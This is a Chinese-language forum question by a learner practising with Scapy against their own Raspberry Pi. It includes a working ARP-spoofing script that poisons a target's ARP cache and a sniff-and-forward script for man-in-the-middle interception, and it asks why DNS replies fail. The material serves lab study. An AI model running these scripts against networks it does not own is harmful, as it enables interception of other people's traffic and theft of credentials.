我正在学习使用Scapy编写Python代码。我阅读并使用了书籍《Network Hacks-Intensivkurs-Angriff und Verteidigung mit Python》(德文)。
我想尝试使用ARP欺骗进行中间人攻击。我有我的计算机、受害者(我的树莓派)和标准网关。
为了进行欺骗,我使用了书中的代码片段。
#!/usr/bin/python
import sys
import time
from scapy.all import sniff, sendp, ARP, Ether
if len(sys.argv) < 3:
print sys.argv[0] + " <target> <spoof_ip>"
sys.exit(0)
iface = "wlan1"
target_ip = sys.argv[1]
fake_ip = sys.argv[2]
ethernet = Ether()
arp = ARP(pdst=target_ip, psrc=fake_ip, op="is-at")
packet = ethernet / arp
while True:
sendp(packet, iface=iface)
time.sleep(10)
它起作用了,我的受害者显示我的MAC地址作为网关。 受害者发送带有正确IP但我的MAC地址的数据包。 现在,受害者应该打开一个网站(wget http//example.com),我想使用Wireshark读取流量。但是我必须重定向数据包(DNS和TCP/HTTP)。我尝试使用以下代码:
#!/etc/usr/python
from scapy.all import *
import sys
iface = "wlan1"
filter = "ip"
VICTIM_IP = "192.168.2.108"
MY_IP = "192.168.2.104"
GATEWAY_IP = "192.168.2.1"
VICTIM_MAC = "### don't want so show###"
MY_MAC = "### don't want so show###"
GATEWAY_MAC = "### don't want so show###"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
packet[Ether].dst = GATEWAY_MAC
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
Wireshark显示了一个正确的数据包(IP源地址=受害者IP地址,IP目标地址=网关IP地址,MAC源地址=受害者MAC地址,MAC目标地址=网关MAC地址)。网关是一个DSL路由器,也是一个“DNS服务器”。
但是我的树莓派没有收到DNS响应。我做错了什么?
此致
MatStorm